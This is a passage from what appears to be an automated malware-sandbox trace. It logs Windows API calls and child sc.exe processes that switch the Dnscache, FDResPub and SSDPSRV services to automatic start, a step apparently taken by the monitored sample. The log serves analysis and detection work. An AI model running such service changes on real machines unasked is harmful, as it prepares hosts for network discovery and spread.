hHeap=0x410000, dwFlags=0x0, lpMem=0x4278a0 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4278b0 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4278c0 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4278d0 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4278e0 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4278f0 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427920 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427930 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427940 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427950 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427960 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427970 | out: hHeap=0x410000) returned 1 [0159.255] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427980 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427990 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4279a0 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4279b0 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4279c0 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4279d0 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4279e0 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4279f0 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a00 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a10 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a20 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a30 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a40 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a50 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a60 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a70 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a80 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a90 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427aa0 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427ab0 | out: hHeap=0x410000) returned 1 [0159.256] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427ac0 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427ad0 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427ae0 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427af0 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b00 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b10 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b20 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b30 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b40 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b50 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b60 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b70 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b80 | out: hHeap=0x410000) returned 1 [0159.257] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b90 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427ba0 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427bb0 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427bc0 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427bd0 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427be0 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427bf0 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c00 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c10 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c20 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c30 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c40 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c50 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c60 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c70 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c80 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c90 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427ca0 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427cb0 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427cc0 | out: hHeap=0x410000) returned 1 [0159.258] GetProcessHeap () returned 0x410000 [0159.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427cd0 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427ce0 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427cf0 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d20 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d30 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d40 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d50 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d60 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d70 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d80 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d90 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427da0 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427db0 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427dc0 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427dd0 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427de0 | out: hHeap=0x410000) returned 1 [0159.259] GetProcessHeap () returned 0x410000 [0159.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427df0 | out: hHeap=0x410000) returned 1 [0159.259] exit (_Code=1) Thread: id = 544 os_tid = 0x1138 Thread: id = 737 os_tid = 0xdd8 Thread: id = 739 os_tid = 0xf48 Thread: id = 740 os_tid = 0x5c0 Thread: id = 764 os_tid = 0x7e4 [0136.781] LocalAlloc (uFlags=0x40, uBytes=0x178) returned 0x4696b0 [0136.781] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x43c088 [0136.781] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x46dfd0 [0136.781] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x44b590 [0136.781] LocalReAlloc (hMem=0x46dfd0, uBytes=0x10, uFlags=0x2) returned 0x4604b0 Process: id = "13" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x7a83c000" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"sc.exe\" config Dnscache start= auto" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 90 os_tid = 0xb78 [0084.413] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fcec | out: lpSystemTimeAsFileTime=0x16fcec*(dwLowDateTime=0xc907850, dwHighDateTime=0x1d6f0d1)) [0084.413] GetCurrentProcessId () returned 0xa88 [0084.413] GetCurrentThreadId () returned 0xb78 [0084.413] GetTickCount () returned 0x114b414 [0084.413] QueryPerformanceCounter (in: lpPerformanceCount=0x16fce4 | out: lpPerformanceCount=0x16fce4*=20351352869) returned 1 [0084.413] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0084.413] __set_app_type (_Type=0x1) [0084.413] __p__fmode () returned 0x770331f4 [0084.413] __p__commode () returned 0x770331fc [0084.413] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x879c7) returned 0x0 [0084.413] __wgetmainargs (in: _Argc=0x89020, _Argv=0x89028, _Env=0x89024, _DoWildCard=0, _StartInfo=0x89034 | out: _Argc=0x89020, _Argv=0x89028, _Env=0x89024) returned 0 [0084.414] SetThreadUILanguage (LangId=0x0) returned 0x409 [0084.416] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.416] GetStdHandle (nStdHandle=0xfffffff5) returned 0x37c [0084.416] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0084.416] _wcsicmp (_String1="config", _String2="query") returned -14 [0084.416] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0084.416] _wcsicmp (_String1="config", _String2="start") returned -16 [0084.417] _wcsicmp (_String1="config", _String2="pause") returned -13 [0084.417] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0084.417] _wcsicmp (_String1="config", _String2="control") returned -14 [0084.417] _wcsicmp (_String1="config", _String2="continue") returned -14 [0084.417] _wcsicmp (_String1="config", _String2="stop") returned -16 [0084.417] _wcsicmp (_String1="config", _String2="config") returned 0 [0084.417] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4dffa8 [0084.419] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0084.419] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0084.419] _wcsicmp (_String1="auto", _String2="boot") returned -1 [0084.419] _wcsicmp (_String1="auto", _String2="system") returned -18 [0084.419] _wcsicmp (_String1="auto", _String2="auto") returned 0 [0084.419] OpenServiceW (hSCManager=0x4dffa8, lpServiceName="Dnscache", dwDesiredAccess=0x3) returned 0x4dff08 [0084.420] QueryServiceConfig2W (in: hService=0x4dff08, dwInfoLevel=0x3, lpBuffer=0x16fbd4, cbBufSize=0x4, pcbBytesNeeded=0x16fbc8 | out: lpBuffer=0x16fbd4, pcbBytesNeeded=0x16fbc8) returned 1 [0084.420] ChangeServiceConfigW (in: hService=0x4dff08, dwServiceType=0xffffffff, dwStartType=0x2, dwErrorControl=0xffffffff, lpBinaryPathName=0x0, lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0, lpDisplayName=0x0 | out: lpdwTagId=0x0) returned 1 [0084.470] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x16fb80, nSize=0x2, Arguments=0x16fb8c | out: lpBuffer="㲸Nﰌ\x16䋒\x08ᡜ\x08༄\x1e\x01") returned 0x22 [0084.473] GetFileType (hFile=0x37c) returned 0x3 [0084.473] LocalAlloc (uFlags=0x0, uBytes=0x44) returned 0x4e3d50 [0084.473] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] ChangeServiceConfig SUCCESS\r\n", cchWideChar=34, lpMultiByteStr=0x4e3d50, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] ChangeServiceConfig SUCCESS\r\n", lpUsedDefaultChar=0x0) returned 34 [0084.473] WriteFile (in: hFile=0x37c, lpBuffer=0x4e3d50, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x16fb70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fb70, lpOverlapped=0x0) returned 0 [0084.474] LocalFree (hMem=0x4e3d50) returned 0x0 [0084.474] LocalFree (hMem=0x4e3cb8) returned 0x0 [0084.474] LocalFree (hMem=0x0) returned 0x0 [0084.474] CloseServiceHandle (hSCObject=0x4dff08) returned 1 [0084.474] CloseServiceHandle (hSCObject=0x4dffa8) returned 1 [0084.766] exit (_Code=0) Thread: id = 101 os_tid = 0x644 Process: id = "14" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x79141000" os_pid = "0xba8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"sc.exe\" config FDResPub start= auto" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 91 os_tid = 0xbb4 [0084.689] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ffdac | out: lpSystemTimeAsFileTime=0x1ffdac*(dwLowDateTime=0xcb8efb0, dwHighDateTime=0x1d6f0d1)) [0084.689] GetCurrentProcessId () returned 0xba8 [0084.689] GetCurrentThreadId () returned 0xbb4 [0084.689] GetTickCount () returned 0x114b51d [0084.689] QueryPerformanceCounter (in: lpPerformanceCount=0x1ffda4 | out: lpPerformanceCount=0x1ffda4*=20378950683) returned 1 [0084.689] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0084.689] __set_app_type (_Type=0x1) [0084.689] __p__fmode () returned 0x770331f4 [0084.689] __p__commode () returned 0x770331fc [0084.689] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x879c7) returned 0x0 [0084.689] __wgetmainargs (in: _Argc=0x89020, _Argv=0x89028, _Env=0x89024, _DoWildCard=0, _StartInfo=0x89034 | out: _Argc=0x89020, _Argv=0x89028, _Env=0x89024) returned 0 [0084.690] SetThreadUILanguage (LangId=0x0) returned 0x409 [0084.693] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.693] GetStdHandle (nStdHandle=0xfffffff5) returned 0x37c [0084.693] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0084.693] _wcsicmp (_String1="config", _String2="query") returned -14 [0084.693] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0084.693] _wcsicmp (_String1="config", _String2="start") returned -16 [0084.693] _wcsicmp (_String1="config", _String2="pause") returned -13 [0084.693] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0084.693] _wcsicmp (_String1="config", _String2="control") returned -14 [0084.693] _wcsicmp (_String1="config", _String2="continue") returned -14 [0084.693] _wcsicmp (_String1="config", _String2="stop") returned -16 [0084.693] _wcsicmp (_String1="config", _String2="config") returned 0 [0084.693] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x52ffa8 [0084.697] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0084.697] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0084.697] _wcsicmp (_String1="auto", _String2="boot") returned -1 [0084.697] _wcsicmp (_String1="auto", _String2="system") returned -18 [0084.697] _wcsicmp (_String1="auto", _String2="auto") returned 0 [0084.698] OpenServiceW (hSCManager=0x52ffa8, lpServiceName="FDResPub", dwDesiredAccess=0x3) returned 0x52ff08 [0084.704] QueryServiceConfig2W (in: hService=0x52ff08, dwInfoLevel=0x3, lpBuffer=0x1ffc94, cbBufSize=0x4, pcbBytesNeeded=0x1ffc88 | out: lpBuffer=0x1ffc94, pcbBytesNeeded=0x1ffc88) returned 1 [0084.707] ChangeServiceConfigW (in: hService=0x52ff08, dwServiceType=0xffffffff, dwStartType=0x2, dwErrorControl=0xffffffff, lpBinaryPathName=0x0, lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0, lpDisplayName=0x0 | out: lpdwTagId=0x0) returned 1 [0084.809] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x1ffc40, nSize=0x2, Arguments=0x1ffc4c | out: lpBuffer="㲸Sﳌ\x1f䋒\x08ᡜ\x08༄*\x01") returned 0x22 [0084.810] GetFileType (hFile=0x37c) returned 0x3 [0084.810] LocalAlloc (uFlags=0x0, uBytes=0x44) returned 0x533d50 [0084.810] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] ChangeServiceConfig SUCCESS\r\n", cchWideChar=34, lpMultiByteStr=0x533d50, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] ChangeServiceConfig SUCCESS\r\n", lpUsedDefaultChar=0x0) returned 34 [0084.810] WriteFile (in: hFile=0x37c, lpBuffer=0x533d50, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x1ffc30, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ffc30, lpOverlapped=0x0) returned 0 [0084.810] LocalFree (hMem=0x533d50) returned 0x0 [0084.810] LocalFree (hMem=0x533cb8) returned 0x0 [0084.810] LocalFree (hMem=0x0) returned 0x0 [0084.810] CloseServiceHandle (hSCObject=0x52ff08) returned 1 [0084.810] CloseServiceHandle (hSCObject=0x52ffa8) returned 1 [0084.852] exit (_Code=0) Thread: id = 108 os_tid = 0x9a4 Process: id = "15" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x79c46000" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"sc.exe\" config SSDPSRV start= auto" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 92 os_tid = 0xb7c [0084.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efd6c | out: lpSystemTimeAsFileTime=0x1efd6c*(dwLowDateTime=0xca121f0, dwHighDateTime=0x1d6f0d1)) [0084.522] GetCurrentProcessId () returned 0xba0 [0084.522] GetCurrentThreadId () returned 0xb7c [0084.522] GetTickCount () returned 0x114b481 [0084.522] QueryPerformanceCounter (in: lpPerformanceCount=0x1efd64 | out: lpPerformanceCount=0x1efd64*=20362286472) returned 1 [0084.522] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0084.522] __set_app_type (_Type=0x1) [0084.522] __p__fmode () returned 0x770331f4 [0084.522] __p__commode () returned 0x770331fc [0084.522] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x879c7) returned 0x0 [0084.523] __wgetmainargs (in: _Argc=0x89020, _Argv=0x89028, _Env=0x89024, _DoWildCard=0, _StartInfo=0x89034 | out: _Argc=0x89020, _Argv=0x89028, _Env=0x89024) returned 0 [0084.523] SetThreadUILanguage (LangId=0x0) returned 0x409 [0084.525] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x37c [0084.525] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0084.525] _wcsicmp (_String1="config", _String2="query") returned -14 [0084.526] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0084.526] _wcsicmp (_String1="config", _String2="start") returned -16 [0084.526] _wcsicmp (_String1="config", _String2="pause") returned -13 [0084.526] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0084.526] _wcsicmp (_String1="config", _String2="control") returned -14 [0084.526] _wcsicmp (_String1="config", _String2="continue") returned -14 [0084.526] _wcsicmp (_String1="config", _String2="stop") returned -16 [0084.526] _wcsicmp (_String1="config", _String2="config") returned 0 [0084.526] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x26ffa0 [0084.528] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0084.528] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0084.528] _wcsicmp (_String1="auto", _String2="boot") returned -1 [0084.528] _wcsicmp (_String1="auto", _String2="system") returned -18 [0084.528] _wcsicmp (_String1="auto", _String2="auto") returned 0 [0084.528] OpenServiceW (hSCManager=0x26ffa0, lpServiceName="SSDPSRV", dwDesiredAccess=0x3) returned 0x26ff00 [0084.528] QueryServiceConfig2W (in: hService=0x26ff00, dwInfoLevel=0x3, lpBuffer=0x1efc54, cbBufSize=0x4, pcbBytesNeeded=0x1efc48 | out: lpBuffer=0x1efc54, pcbBytesNeeded=0x1efc48) returned 1 [0084.528] ChangeServiceConfigW (in: hService=0x26ff00, dwServiceType=0xffffffff, dwStartType=0x2, dwErrorControl=0xffffffff, lpBinaryPathName=0x0, 